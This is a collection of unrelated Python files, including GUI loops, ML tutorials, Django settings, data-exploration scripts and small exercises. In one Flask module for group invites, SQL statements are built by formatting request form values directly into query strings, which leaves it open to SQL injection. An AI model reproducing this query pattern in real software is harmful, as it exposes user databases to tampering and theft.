screen = pygame.display.set_mode((dic_configurations[LARGEUR_ECRAN],
dic_configurations[HAUTEUR_ECRAN]))
self.environnement.init_pygame(dic_configurations)
while self.running_pygame:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.stop_pygame()
break
elif event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
self.environnement.gere_clic(*pygame.mouse.get_pos())
elif event.button == 4:
self.environnement.gere_zoom(True, *pygame.mouse.get_pos())
elif event.button == 5:
self.environnement.gere_zoom(False, *pygame.mouse.get_pos())
elif event.type == pygame.MOUSEMOTION:
self.environnement.gere_deplacement_souris(*pygame.mouse.get_pos())
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.stop_pygame()
break
try:
self.environnement.affiche(screen)
except:
print("Oups !")
pygame.display.update()
pygame.time.Clock().tick(self.var_fps_pygame.get())
self.environnement.carte.ecran = None
pygame.quit()
return
def run_graphs_matplotlib(self, garph: bool, caractere_3D: list = None, vitesse_rotate=None, hauteur_z=None):
if garph:
caractere_3D = None
plt.ion()
id_fig = self.environnement.stats.init_graph_matplotlib(caractere_3D, vitesse_rotate, hauteur_z)
self.list_id_figs_matplotlib.append(id_fig)
self.tk_nb_figs_matplotlib.set(self.tk_nb_figs_matplotlib.get() + 1)
while self.running_matplotbil:
self.environnement.stats.update_graph_matplotlib(id_fig)
self.environnement.stats.dic_id_figs[id_fig][PARAM_MATPLOTLIB_FIG].canvas.draw_idle()
try:
self.environnement.stats.dic_id_figs[id_fig][PARAM_MATPLOTLIB_FIG].canvas.flush_events()
except tkinter.TclError:
if len(self.list_id_figs_matplotlib) == 1:
self.stop_matplotlib()
break
time.sleep(1 / self.var_fps_matplotlib.get())
plt.close(id_fig)
# C'est pas très propre (pas du tout !) mais ça marche...
try:
self.environnement.stats.dic_id_figs[id_fig][PARAM_MATPLOTLIB_FIG].canvas.draw_idle()
self.environnement.stats.dic_id_figs[id_fig][PARAM_MATPLOTLIB_FIG].canvas.flush_events()
except tkinter.TclError:
pass # Ca devrait tout le temps faire cette erreur et arrêter je ne sais quoi de Matplotlib...
del self.environnement.stats.dic_id_figs[id_fig]
self.list_id_figs_matplotlib.remove(id_fig)
self.tk_nb_figs_matplotlib.set(self.tk_nb_figs_matplotlib.get() - 1)
return
|
import unittest
import os
from conans.test.utils.tools import TestClient
from conans.util.files import save
from conans.client.conan_api import get_basic_requester
class ProxiesConfTest(unittest.TestCase):
def setUp(self):
self.old_env = dict(os.environ)
def tearDown(self):
os.environ.clear()
os.environ.update(self.old_env)
def test_requester(self):
client = TestClient(default_profile=False)
conf = """
[proxies]
https=None
no_proxy=http://someurl,http://otherurl.com
http=http:/conan.url
"""
save(client.client_cache.conan_conf_path, conf)
requester = get_basic_requester(client.client_cache)
self.assertEqual(requester.proxies, {"https": None,
"http": "http:/conan.url"})
self.assertEqual(os.environ["NO_PROXY"], "http://someurl,http://otherurl.com")
|
# ----------------------------------------------------------------------------
# Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Example that creates and uses a network without a configuration file.
"""
import logging
from neon.backends import gen_backend
from neon.layers import FCLayer, DataLayer, CostLayer
from neon.models import MLP
from neon.transforms import RectLin, Logistic, CrossEntropy
from neon.datasets import MNIST
from neon.experiments import FitPredictErrorExperiment
logging.basicConfig(level=20)
logger = logging.getLogger()
def create_model(nin):
layers = []
layers.append(DataLayer(nout=nin))
layers.append(FCLayer(nout=100, activation=RectLin()))
layers.append(FCLayer(nout=10, activation=Logistic()))
layers.append(CostLayer(cost=CrossEntropy()))
model = MLP(num_epochs=10, batch_size=128, layers=layers)
return model
def run():
model = create_model(nin=784)
backend = gen_backend(rng_seed=0)
dataset = MNIST(repo_path='~/data/')
experiment = FitPredictErrorExperiment(model=model,
backend=backend,
dataset=dataset)
experiment.run()
if __name__ == '__main__':
run()
|
class Solution:
def twoSum(self, num, target):
map = {}
for i in range(len(num)):
if num[i] not in map:
map[target - num[i]] = i
else:
return map[num[i]], i
examples = [
[[2, 7, 11, 15], 9],
[[3, 2, 4], 6],
[[3, 3], 6]
]
for example in examples:
print(Solution().twoSum(*example)) |
import tensorflow as tf
hello_world = tf.constant('Hello World!', dtype=tf.string) #常量tensor
print(hello_world) #这时hello_world是一个tensor,代表一个运算的输出
# out: Tensor("Const:0", shape=(), dtype=string)
hello = tf.placeholder(dtype=tf.string, shape=[None])#占位符tensor,在sess.run时赋值
world = tf.placeholder(dtype=tf.string, shape=[None])
hello_world2 = hello+world #加法运算tensorprint(hello_world2)
# out: Tensor("add:0", shape=(?,), dtype=string)
# math
x = tf.Variable([1.0, 2.0])# 变量tensor,可变。
y = tf.constant([3.0, 3.0])
mul = tf.multiply(x, y)# 点乘运算tensor
# logical
rgb = tf.constant([[[255], [0], [126]]], dtype=tf.float32)
logical = tf.logical_or(tf.greater(rgb,250.), tf.less(rgb, 5.))# 逻辑运算,rgb中>250 or <5的位置被标为True,其它False
where = tf.where(logical, tf.fill(tf.shape(rgb),1.), tf.fill(tf.shape(rgb),5.))# True的位置赋值1,False位置赋值5
# 启动默认图.
# sess = tf.Session()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())# 变量初始化
result = sess.run(hello_world) # Fetch, 获取tensor运算结果
print(result, result.decode(), hello_world.eval())# `t.eval()` is a shortcut for calling `tf.get_default_session().run(t)`.
# out: b'Hello World!' Hello World! b'Hello World!' #前辍'b'表示bytestring格式,decode解成string格式
print(sess.run(hello, feed_dict={hello: ['Hello']}))
# out: ['Hello']
print(sess.run(hello_world2, feed_dict={hello: ['Hello'], world: [' World!']}))#Feed,占位符赋值
# out: [b'Hello World!']
print(sess.run(mul))
# out: [ 3. 6.]
print(sess.run(logical))
# out: [[[ True] [ True] [False]]] #rgb中>250 or <5的位置被标为True,其它False print(sess.run(where))
# out: [[[ 1.] [ 1.] [ 5.]]] #True的位置赋值1,False位置赋值5
# sess.close()#sess如果不是用with方式定义,需要close
|
import os
import sys
sys.path.append(os.getenv('cf'))
import datetime
from cartoforum_api.orm_classes import sess
from flask import session, render_template, request, jsonify
from cartoforum_api.orm_classes import GroupRequests, Group, Users, UsersGroups, InviteMe
from cartoforum_api.core import cur, pgconnect
# @cfapp.route('/invite_user', methods=['GET'])
def invite_user():
invitee = request.args.get('invitee', type=str)
try:
inviteeuserid = sess.query(Users).filter_by(username=invitee).one().userid
except:
return jsonify(response="user doesn't exist")
inviteexists = sess.query(GroupRequests).filter_by(invitee=inviteeuserid).\
filter_by(groupid=session['groupid']).count()
if inviteexists > 0:
return jsonify(response='invite already exists')
useringroup = sess.query(UsersGroups).filter_by(groupid=session['groupid']).filter_by(userid=inviteeuserid).count()
if useringroup > 0:
return jsonify(response='user already in group')
newinvite = GroupRequests(requester=session['userid'], invitee=inviteeuserid, groupid=session['groupid'],
dateissued=datetime.datetime.utcnow(), complete='f')
sess.add(newinvite)
sess.commit()
return jsonify(response='invite sent')
def get_user_invites(userid):
invreq = {'invites': [], 'requests': []}
for gr, g, u in sess.query(GroupRequests, Group, Users).filter_by(invitee=userid).\
filter_by(complete='f').join(Group).join(Users):
invreq['requests'].append({"requestid": gr.requestid, "requester": u.username, "group": g.groupname,
"date": gr.dateissued})
cur.execute("SELECT inviteme.requestid, users.username, groups.groupname, inviteme.date "
"FROM inviteme INNER JOIN users ON users.userid = inviteme.userid "
"JOIN groups ON groups.groupid = inviteme.groupid "
"WHERE accepted is null AND groups.userid = '{}'".format(userid))
response = cur.fetchall()
for row in response:
invreq['invites'].append({"requestid": row[0], "requester": row[1], "group": [2], "date": row[3]})
pgconnect.commit()
return invreq
# @cfapp.route('/manageRequest', methods=['POST'])
def manage_request():
requestid = request.form['requestid']
action = request.form['submit']
cur.execute("SELECT groupid,invitee FROM grouprequests WHERE requestid = {};".format(requestid))
response = cur.fetchall()
for row in response:
if action == 'accept':
# make sure it doesn't add twice
cur.execute("INSERT INTO usersgroups VALUES ({},{})".format(row[1], row[0]))
cur.execute("UPDATE grouprequests set complete = 't' WHERE requestid = {}".format(requestid))
pgconnect.commit()
return render_template('groupselect.html')
# @cfapp.route('/manageInvite', methods=['POST'])
def accept_invite():
requestid = request.form['requestid']
action = request.form['submit']
cur.execute("SELECT groupid,userid FROM inviteme WHERE requestid = {};".format(requestid))
response = cur.fetchall()
for row in response:
if action == 'accept':
# make sure it doesn't add twice
cur.execute("INSERT INTO usersgroups VALUES ({},{})".format(row[1], row[0]))
cur.execute("UPDATE inviteme set accepted = 't' WHERE requestid = {}".format(requestid))
pgconnect.commit()
return render_template('groupselect.html')
# @cfapp.route('/request_invite', methods=['POST'])
def request_invite():
gid = request.form['gid']
newinvite = InviteMe(userid=session['userid'], groupid=gid, date=datetime.datetime.utcnow())
sess.add(newinvite)
sess.commit()
return render_template("discovery.html", invite="sent")
|
import json
import gzip
from pprint import pprint
from sets import Set
from collections import Counter, defaultdict
import matplotlib.pyplot as plt
import re
import numpy as np
from sklearn.feature_extraction import DictVectorizer
import sys
import pickle
import copy
from random import shuffle
class Recipe(object):
def __init__(self, uid=None, cuisine=None, ingredients=[]):
self.uid = uid
self.cuisine = cuisine
self.ingredients = ingredients
def get_int_ingredients(self, feature_dict):
# array returned will be formatted as follows:
#[ingredient0, ingredient1 ... ingredientn]
return [feature_dict[ingredient] for ingredient in self.ingredients]
def get_int_cuisine(self, cuisine_dict):
return cuisine_dict[self.cuisine]
# will used to remove certain words in order to reduce feature space
black_list = ["whole", "fat", "reduced", "low", "crushed", "fine", "fresh",
"ground", "less", "chopped", "nonfat", "lowfat", "large", "grated", "sodium", "lowsodium", "free", "lean", "no", "solid", "cooking", "tips", "kraft", "fresh", "frozen", "chopped", "oz", "boneless", "skinless", "tastethai", "barilla", "bertolli", "bestfoods", "campbells", "lowfat", "crisco pure", "crystal farms" "reduced fat", "delallo", "domino", "heinz", "herdez", "hiddenvalleyoriginal", "johnsonville", "and", "fat free", "reducedsodium", "lowsodium", "lowersodium"]
def intersect(a, b):
return list(set(a) & set(b))
def remove_words(words=[], black_list=[]):
new_list = []
for word in words:
overlap = intersect(word.lower().split(" "), black_list)
if overlap:
for term in overlap:
word = word.replace(term, "")
if word:
new_list.append(word)
return new_list
def clean(words=[]):
clean_list = []
# Remove everything that's not a letter or space
for word in words:
clean_word = re.sub(r"[^a-zA-Z]", " ", word)
clean_list.append(clean_word.lower().strip())
return clean_list
def graph(dict_to_graph={}):
plt.barh(range(len(dict_to_graph)), dict_to_graph.values(), align='center')
plt.yticks(range(len(dict_to_graph)), dict_to_graph.keys())
plt.show()
def reduce_to_single_word(words=[]):
new_set = Set()
for word in words:
for w in word.lower().split(" "):
if w:
new_set.add(w)
return new_set
# main starts here
def main():
recipes = []
recipes_test = []
# If true uses blacklist to remove words
REMOVE_WORDS = True
REDUCE_TO_SINGLE = True
CLEAN = True
GET_UNIFORM = False
#artifically inflate data size by using duplicate data
GET_DUPLICATE = False
# Multiplied the the class count of the class with the least number of
# occurances.
NUMBER_OF_SAMPLES_PER_CLASS = 1000
features = []
classes = []
# used to count occurances of each ingrediant and cuisine type
feature_cnt = Counter()
class_cnt = Counter()
feature_map = {}
class_map = {}
class_total_cnt = Counter()
with open('train.json') as f:
recipes_json = json.loads(f.read())
for recipe in recipes_json:
uid = int(recipe['id'])
cuisine = str(recipe['cuisine']).strip()
classes.append(cuisine)
features += recipe['ingredients']
recipes.append(Recipe(uid, cuisine, recipe['ingredients']))
with open('test.json') as f:
recipes_json = json.loads(f.read())
for recipe in recipes_json:
uid = int(recipe['id'])
features += recipe['ingredients']
recipes_test.append(
Recipe(uid=uid, ingredients=recipe['ingredients']))
print "Total number of samples: %d" % len(recipes)
print "Total number of test samples %d" % len(recipes_test)
# the recipes are shuffled each time. This way we can get different
# training subsets from the larager data set
shuffle(recipes)
label = 0
for c in Set(classes):
class_map[c] = label
label += 1
print class_map
# clean recipes
if CLEAN:
features = clean(features)
for recipe in recipes:
recipe.ingredients = clean(recipe.ingredients)
for recipe in recipes_test:
recipe.ingredients = clean(recipe.ingredients)
if REDUCE_TO_SINGLE:
print "Reducing to single"
features = Set(reduce_to_single_word(features))
for recipe in recipes:
recipe.ingredients = Set(reduce_to_single_word(recipe.ingredients))
for recipe in recipes_test:
recipe.ingredients = Set(reduce_to_single_word(recipe.ingredients))
if REMOVE_WORDS:
print "Removing words"
features = Set(remove_words(features, black_list))
for recipe in recipes:
recipe.ingredients = Set(
remove_words(recipe.ingredients, black_list))
for recipe in recipes_test:
recipe.ingredients = Set(
remove_words(recipe.ingredients, black_list))
if GET_UNIFORM:
bins = defaultdict(list)
for recipe in recipes:
bins[class_map[recipe.cuisine]].append(recipe)
recipes = []
for key in bins.keys():
class_count = len(bins[key])
while GET_DUPLICATE and (class_count < NUMBER_OF_SAMPLES_PER_CLASS):
print "Adding [%d] more recipes to [%s]" % (class_count, key)
bins[key] += copy.copy(bins[key])
class_count = len(bins[key])
# print len(bins[key])
# for i in range(len(bins[key]) % NUMBER_OF_SAMPLES_PER_CLASS):
recipes = recipes + bins[key][:NUMBER_OF_SAMPLES_PER_CLASS]
# print recipes[0]
shuffle(recipes)
print "Numober of train samples %d" % len(recipes)
print "Numober of test samples %d" % len(recipes_test)
feature_map = []
y_train = []
labels = []
for recipe in recipes:
ing_d = dict()
labels.append(recipe.uid)
y_train.append(class_map[recipe.cuisine])
for ingredient in recipe.ingredients:
ing_d[ingredient] = ingredient
feature_map.append(ing_d)
labels_test = []
feature_map_test = []
for recipe in recipes_test:
ing_d = dict()
labels_test.append(recipe.uid)
for ingredient in recipe.ingredients:
ing_d[ingredient] = ingredient
feature_map_test.append(ing_d)
vec = DictVectorizer(dtype=np.int)
X_train = vec.fit_transform(feature_map).toarray()
X_test = vec.transform(feature_map_test).toarray()
print "num train features : %d" % len(X_train.transpose())
print "num test features : %d" % len(X_test.transpose())
y_train = np.asarray(y_train)
labels = np.asarray(labels)
labels_test = np.asarray(labels_test)
label_y = np.append([labels], [y_train], axis=0)
all_data = np.append(label_y, X_train.transpose(), axis=0)
all_data_test = np.append([labels_test], X_test.transpose(), axis=0)
# print all_data
train_file_name = 'nn_train_%d' % len(recipes)
test_file_name = 'nn_test'
np.save(train_file_name, all_data)
np.save(test_file_name, all_data_test)
print "Saving %s" % train_file_name
print "Saving %s" % test_file_name
# print y_train
if __name__ == "__main__":
main()
|
import turtle #Importa a biblioteca Turtle
t = turtle.Pen() #Inicializa a caneta
turtle.bgcolor('black') #Altera a cor do fundo
turtle.title("Titulo") #Coloca o título da janela
circulos = 4 #Seleciona o número de circulos
colors = ['red', 'yellow', 'blue', 'orange'] #Passa a lista de cores que serão usadas
for x in range(360): #Estrutura de repetição
t.pencolor(colors[x%circulos]) # Alterna entre 6 cores
t.circle(x * 3/circulos + x) # Aumenta raio do desenho
t.left (360/circulos + 1) # Gira 360/circulos e adiciona p/ espiral
t.width (x*circulos/200) # Aumenta a largura do traço |
#tf.estimator is a high-level tensorflow library
#runing training loops
#runing evaluation loops
#managing data set
import tensorflow as tf
import numpy as np
#declare list of features
feature_columns = [tf.feature_column.numeric_column("x",shape= [1])]
estimator = tf.estimator.LinearRegressor(feature_columns = feature_columns)
x_train = np.array([1.,2.,3.,4.,])
y_train = np.array([0.,-1.,-2.,-3.])
x_eval = np.array([2.,4.,8.,1.])
y_eval = np.array([-1.01,-4.1,-7.,0.])
input_fn = tf.estimator.inputs.numpy_input_fn({"x":x_train},y_train,batch_size = 4,num_epochs=None,shuffle = True)
train_input_fn = tf.estimator.inputs.numpy_input_fn({"x":x_train},y_train,batch_size = 4,num_epochs=1000,shuffle = False)
eval_input_fn = tf.estimator.inputs.numpy_input_fn({"x":x_eval},y_eval,batch_size = 4,num_epochs=1000,shuffle = False)
estimator.train(input_fn = input_fn,steps = 1000)
train_metrics = estimator.evaluate (input_fn = train_input_fn)
eval_metrics = estimator.evaluate(input_fn = eval_input_fn)
print("train metrics:%r"%train_metrics)
print("eval metrics:%r"%eval_metrics) |
# Enter your code here. Read input from STDIN. Print output to STDOUT
import math
x = complex(input())
a= x.real
b= x.imag
print(math.hypot(a,b))
print(math.atan2(b,a))
|
# Visualize and explore data / exploratory data analysis
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
## Import data
hmda_train=pd.read_csv('hmda_train.csv')
cat_cols = ['msa_md', 'state_code', 'county_code', \
'lender', 'loan_type', 'property_type', 'loan_purpose', 'occupancy', 'preapproval', \
'applicant_ethnicity', 'applicant_race', 'applicant_sex', 'co_applicant']
num_cols = ['loan_amount', 'applicant_income', \
'population', 'minority_population_pct', 'ffiecmedian_family_income', 'tract_to_msa_md_income_pct', 'number_of_owner_occupied_units', 'number_of_1_to_4_family_units']
## Identity row_id
## Label rate_spread
## Accumulate categories
## Recode the categorical features
code_list = [
['loan_type',
{ 1 : 'Conventional',
2 : 'FHA-insured',
3 : 'VA-guaranteed',
4 : 'FSA/RHS' } ],
['property_type',
{ 1 : '1-4-family',
2 : 'Manufactured housing',
3 : 'Multifamily' } ],
['loan_purpose',
{ 1 : 'Home purchase',
2 : 'Home improvement',
3 : 'Refinancing' } ],
['occupancy' ,
{ 1 : 'Owner-occupied',
2 : 'Not owner-occupied',
3 : 'Not applicable' } ],
['preapproval',
{ 1 : 'Requested',
2 : 'Not requested',
3 : 'Not applicable' } ],
['applicant_ethnicity',
{ 1 : 'Hispanic or Latino',
2 : 'Not Hispanic or Latino',
3 : 'Not provided',
4 : 'Not applicable' } ],
['applicant_race',
{ 1 : 'American Indian or Alaska Native',
2 : 'Asian',
3 : 'Black or African American',
4 : 'Native Hawaiian or Other Pacific Islander',
5 : 'White',
6 : 'Not provided',
7 : 'Not applicable' } ],
['applicant_sex',
{ 1 : 'Male',
2 : 'Female',
3 : 'NA',
4 : 'Not applicable' } ]
]
for col_dic in code_list:
col = col_dic[0]
dic = col_dic[1]
hmda_train[col] = [dic[x] for x in hmda_train[col]]
print(hmda_train.head())
#####################################################################
## Explore the data
print(hmda_train.head())
print(hmda_train.dtypes)
for column in num_cols:
print(hmda_train[column].describe())
print(hmda_train['rate_spread'].describe())
## Compute and display a frequency table
def count_unique(hmda_train, cols):
for col in cols:
print('\n' + 'For column ' + col)
print(hmda_train[col].value_counts())
hmda_vc=hmda_train[col].value_counts()#.sort_values(by=col, ascending=True)
print(hmda_vc.sort_index())
count_unique(hmda_train, cat_cols + ['rate_spread'])
## Category columns with some categories having few distributions
## 'county_code', 'lender'
## 'msa_md', 'state_code' ???
cat_cols = ['msa_md', 'state_code', 'loan_type', 'property_type', 'loan_purpose', 'occupancy', 'preapproval', \
'applicant_ethnicity', 'applicant_race', 'applicant_sex', 'co_applicant']
## Treat outliers
## 'rate_spread' = 99 (3) or <= 32
#hmda_outliers = hmda_train.loc[hmda_train['rate_spread'] == 99. ]
hmda_outliers = hmda_train.loc[hmda_train['rate_spread'] >= 9. ]
print(hmda_outliers.shape)
#for col in hmda_outliers.columns:
# print(hmda_outliers[col])
#hmda_train.loc[hmda_train['rate_spread'] == 99, 'rate_spread'] = np.nan
hmda_train.loc[hmda_train['rate_spread'] >= 9, 'rate_spread'] = np.nan
hmda_train.dropna(axis = 0, inplace = True)
print(hmda_train.shape)
## Visualizing data
## Visualizing distributions (1D)
## * Bar charts
def plot_bars(hmda_train, cols):
for col in cols:
fig = plt.figure(figsize=(6,6)) # define plot area
ax = fig.gca() # define axis
counts = hmda_train[col].value_counts() # find the counts for each unique category
counts.plot.bar(ax = ax, color = 'blue') # Use the plot.bar method on the counts data frame
ax.set_title('Counts by ' + col) # Give the plot a main title
ax.set_xlabel(col) # Set text for the x axis
ax.set_ylabel('Counts')# Set text for y axis
plt.show()
#plot_bars(hmda_train, cat_cols)
## * Histograms
def plot_histogram(hmda_train, cols, bins = 10):
for col in cols:
fig = plt.figure(figsize=(6,6))
ax = fig.gca()
hmda_train[col].plot.hist(ax = ax, bins = bins)
ax.set_title('Histogram of ' + col)
ax.set_xlabel(col)
ax.set_ylabel('Counts')
plt.show()
#plot_histogram(hmda_train, num_cols)
## * KDE (kernel density estimation) using Seaborn
def plot_density_hist(hmda_train, cols, bins = 10, hist = False):
for col in cols:
sns.set_style("whitegrid")
sns.distplot(hmda_train[col], bins = bins, rug=True, hist = hist)
plt.title('Histogram of ' + col)
plt.xlabel(col)
plt.ylabel('Counts')
plt.show()
## * Histograms and KDE
#plot_density_hist(hmda_train, num_cols, bins = 20, hist = True)
## Two dimensional plots
## Scatter
def plot_scatter(hmda_train, cols, col_y = 'rate_spread'):
for col in cols:
fig = plt.figure(figsize=(7,6))
ax = fig.gca()
hmda_train.plot.scatter(x = col, y = col_y, ax = ax)
ax.set_title('Scatter plot of ' + col_y + ' vs. ' + col)
ax.set_xlabel(col)
ax.set_ylabel(col_y)
plt.show()
#plot_scatter(hmda_train, num_cols)
## Check colinear relation
## Deal with overplotting
## * Transparency
def plot_scatter_t(hmda_train, cols, col_y = 'rate_spread', alpha=1.0):
for col in cols:
fig = plt.figure(figsize=(7,6))
ax = fig.gca()
hmda_train.plot.scatter(x = col, y = col_y, ax = ax, alpha = alpha)
ax.set_title('Scatter plot of ' + col_y + ' vs. ' + col)
ax.set_xlabel(col)
ax.set_ylabel(col_y)
plt.show()
#plot_scatter_t(hmda_train, num_cols, alpha = 0.2)
## * Countour plots / 2d density plots
def plot_density_2d(hmda_train, cols, col_y = 'rate_spread', kind = 'kde'):
for col in cols:
sns.set_style("whitegrid")
sns.jointplot(col, col_y, data=hmda_train, kind = kind)
plt.xlabel(col)
plt.ylabel(col_y)
plt.show()
plot_density_2d(hmda_train, num_cols)
## Relation between categorical and numeric variables
## * Box plots
def plot_box(hmda_train, cols, col_y = 'rate_spread'):
for col in cols:
sns.set_style("whitegrid")
sns.boxplot(col, col_y, data=hmda_train)
plt.xlabel(col)
plt.ylabel(col_y)
plt.show()
#plot_box(hmda_train, cat_cols)
## * Violine plots
def plot_violin(hmda_train, cols, col_y = 'rate_spread'):
for col in cols:
sns.set_style("whitegrid")
sns.violinplot(col, col_y, data=hmda_train)
plt.xlabel(col)
plt.ylabel(col_y)
plt.show()
plot_violin(hmda_train, cat_cols)
## Additional dimensions
hmda_train.to_csv('hmda_train_pre1.csv', index=False)
|
"""
Sebastian Raschka 2014-2016
Python Progress Indicator Utility
Author: Sebastian Raschka <sebastianraschka.com>
License: BSD 3 clause
Contributors: https://github.com/rasbt/pyprind/graphs/contributors
Code Repository: https://github.com/rasbt/pyprind
PyPI: https://pypi.python.org/pypi/PyPrind
"""
import sys
import time
import pyprind
n = 100
sleeptime = 0.02
def test_basic_percent():
perc = pyprind.ProgPercent(n)
for i in range(n):
time.sleep(sleeptime)
perc.update()
def test_stdout():
perc = pyprind.ProgPercent(n, stream=sys.stdout)
for i in range(n):
time.sleep(sleeptime)
perc.update()
def test_generator():
for i in pyprind.prog_percent(range(n), stream=sys.stdout):
time.sleep(sleeptime)
def test_monitoring():
perc = pyprind.ProgPercent(n, monitor=True)
for i in range(n):
time.sleep(sleeptime)
perc.update()
print(perc)
def test_item_tracking():
items = ['file_%s.csv' % i for i in range(0, n)]
perc = pyprind.ProgPercent(len(items))
for i in items:
time.sleep(sleeptime)
perc.update(item_id=i)
def test_force_flush():
perc = pyprind.ProgPercent(n)
for i in range(n):
time.sleep(sleeptime)
perc.update(force_flush=True)
def test_update_interval():
perc = pyprind.ProgPercent(n, update_interval=4)
for i in range(n):
time.sleep(sleeptime)
perc.update()
if __name__ == "__main__":
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Basic Percentage Indicator\n')
test_basic_percent()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing stdout Stream\n')
test_stdout()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Percentage Indicator Generator\n')
test_generator()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing monitor function\n')
test_monitoring()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Item Tracking\n')
test_item_tracking()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Force Flush\n')
test_force_flush()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Update Interval\n')
test_update_interval()
|
from .base import *
import os
import raven
DEBUG = False
ALLOWED_HOSTS = ['comunidadbiblicadefe.herokuapp.com','comunidadbiblicadefe.org', 'www.comunidadbiblicadefe.org', 'production.comunidadbiblicadefe.org']
# HTTPS CONFIG
#SECURE_SSL_REDIRECT = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# HSTS CONFIG
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_SECONDS = 31536000
# COOKIE SECURE CONFIG
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_CONTENT_TYPE_NOSNIFF = True
INSTALLED_APPS += (
'storages',
'raven.contrib.django.raven_compat',
'opbeat.contrib.django',
)
RAVEN_CONFIG = {
'dsn': os.environ.get('DJANGO_SENTRY_DSN'),
# If you are using git, you can also automatically configure the
# release based on the git info.
}
# DATABASE CONFIG
DATABASES = dict(default=dj_database_url.config(default=os.environ.get('DATABASE_URL')))
# S3 AWS CONFIG
AWS_STORAGE_BUCKET_NAME = 'comunidadbf'
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')
AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME
STATIC_URL = "https://%s/" % AWS_S3_CUSTOM_DOMAIN
STATICFILES_LOCATION = 'static'
STATICFILES_STORAGE = 'CBF.custom_storages.StaticStorage'
STATIC_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)
MEDIAFILES_LOCATION = 'media'
MEDIA_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)
DEFAULT_FILE_STORAGE = 'CBF.custom_storages.MediaStorage'
# GOOGLE ANALYTICS CONFIG
GOOGLE_ANALYTICS_PROPERTY_ID = os.environ.get('GOOGLE_ANALYTICS_ID')
GOOGLE_ANALYTICS_SITE_SPEED = True
# OPBEAT CONFIG
MIDDLEWARE_CLASSES += (
'opbeat.contrib.django.middleware.OpbeatAPMMiddleware',
)
OPBEAT = {
'ORGANIZATION_ID': os.environ.get('DJANGO_OPBEAT_ORGANIZATION_ID'),
'APP_ID': os.environ.get('DJANGO_OPBEAT_APP_ID'),
'SECRET_TOKEN': os.environ.get('DJANGO_OPBEAT_SECRET_TOKEN'),
}
|
from flask import Blueprint, g
bp = Blueprint('bp', __name__)
from . import auth
from . import main
from . import events
|
# /usr/bin/env python
# -*- coding:utf-8 -*-
class Stack:
def __init__(self):
self.items = []
def size(self):
return len(self.items)
def push(self, value):
self.items.append(value)
def pop(self):
return self.items.pop()
def is_empty(self):
return self.items == []
def peek(self):
return self.items[len(self.items) - 1]
def coverter(num, base):
digits = '0123456789ABCDEF'
s = Stack()
while num > 0:
res = num % base
num = num // base
print('res: ', res)
s.push(res)
str = ''
while not s.is_empty():
str += digits[s.pop()]
return str
if __name__ == '__main__':
res = coverter(34, 16)
print('res:', res)
|
# coding: utf-8
# Exercise Set 2, Question 4
# In[3]:
import numpy as np
import matplotlib.pyplot as plt
from numpy import random as rn
# In[111]:
sigma=np.linspace(0.1, 0.6,(0.6-0.1)/0.02+1)
prob=np.zeros(len(sigma))
Tmax=10
N=200
h=Tmax/N
t=np.linspace(0, Tmax,Tmax/h+1)
M=10000
Z=rn.randn(M,N)
for k in range(0,len(sigma)-1):
X=(np.zeros((M,N+1)))
X[:,0]=X[:,0]+0.5
sig=sigma[k]
for j in range(0,M):
for i in range(0,N):
if (np.abs(X[j,i])<10):
X[j,i+1]=X[j,i]+h*X[j,i]*(1-X[j,i])+sig*np.sqrt(h)*Z[j,i];
else:
X[j,i+1]=10;
prob[k]=np.sum(X[:,N]==10)/M;
plt.plot(sigma[:-1],prob[:-1])
#We expect the probability of divergence to increase with sigma -
#higher fluctuations gives more chance of divergence.
# In[116]:
plt.plot(sigma[:-1],prob[:-1])
# In[92]:
X=np.concatenate( X, axis=0 )
plt.show()
|
from django.contrib import admin
from data_show import models
# Register your models here.
admin.site.empty_value_display = 'Unknown'
admin.site.list_max_show_all = 10
# inline and admin model for Club
class FilesInline(admin.TabularInline):
model = models.File
extra = 0
@admin.register(models.Club)
class ClubAdmin(admin.ModelAdmin):
date_hierarchy = 'create_date'
list_display = (
'name',
'source',
'club_head',
)
readonly_fields = ('date_ymd',)
inlines = [
FilesInline,
]
@admin.register(models.File)
class FileAdmin(admin.ModelAdmin):
pass
# inlines and admin model for Student
class ContactInline(admin.TabularInline):
model = models.Contact
extra = 1
class ClubLeaderInline(admin.TabularInline):
model = models.Club
verbose_name = 'club to lead'
fields = ('name', 'source')
fk_name = 'club_head'
extra = 0
class ClubManagerInline(admin.TabularInline):
model = models.Club
verbose_name = 'club to manage'
fields = ('name', 'source')
fk_name = 'manager'
extra = 0
@admin.register(models.Student)
class StudentAdmin(admin.ModelAdmin):
list_display = (
'full_name',
'email',
'telephone',
)
fields = (
'portrait',
('first_name', 'last_name'),
('email', 'telephone'),
'status',
)
